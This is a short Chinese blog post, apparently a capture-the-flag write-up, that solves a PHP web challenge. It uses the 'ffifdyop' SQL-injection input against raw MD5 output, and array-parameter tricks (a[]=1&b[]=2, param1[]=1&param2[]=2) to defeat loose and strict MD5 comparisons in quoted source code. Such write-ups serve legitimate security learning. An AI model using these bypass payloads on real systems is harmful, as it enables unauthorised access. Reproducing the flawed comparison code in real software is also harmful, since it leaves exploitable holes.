这篇博客探讨了如何通过特定的输入方式绕过Web应用的安全验证。作者分析了源代码中的hint,揭示了一个条件判断漏洞,允许用户通过构造特定的参数(如`password='xxx'or数字`)来避开MD5校验。此外,还介绍了如何利用数组参数来绕过其他验证机制。博客内容涉及Web安全、漏洞利用和POST请求的使用。
进入环境
查看源代码没有hint
爆下目录没发现什么
抓包发现响应头有hint
password与之前的输入框参数对应
这里可以绕过md5函数使其为恒真
即password='xxx'or 数字就行
输入ffifdyop绕过
源代码提示
<!--
$a = $GET['a'];
$b = $_GET['b'];
if($a != $b && md5($a) == md5($b)){
// wow, glzjin wants a girl friend.
-->
这里用数组绕过?a[]=1&&b[]=2
<?php
error_reporting(0);
include "flag.php";
highlight_file(__FILE__);
if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
echo $flag;
}
这里也差不多换成post传参
param1[]=1¶m2[]=2
扫一扫
763
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
